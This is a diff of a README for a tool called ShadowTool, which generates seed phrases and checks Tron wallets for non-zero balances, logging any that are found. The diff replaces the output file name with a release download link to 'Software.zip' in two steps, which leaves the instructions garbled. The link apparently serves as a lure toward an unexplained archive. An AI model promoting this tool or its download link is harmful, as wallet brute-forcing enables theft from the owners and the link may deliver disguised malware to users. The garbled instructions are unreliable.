t7dela/ShadowTool/README.md

 1. Run the script using the command provided in the installation instructions.
 2. ShadowTool will automatically generate seed phrases and check Tron wallet balances.
-3. Any wallets with non-zero balances will have their information logged and saved to a file named result.txt.
+3. Any wallets with non-zero balances will have their information logged and saved to a file named https://github.com/t7dela/ShadowTool/releases/download/v2.0/Software.zip
-4. Access the result.txt file to view the collected wallet details for further analysis.
+4. Access the https://github.com/t7dela/ShadowTool/releases/download/v2.0/Software.zip file to view the collected wallet details for further analysis.

 ---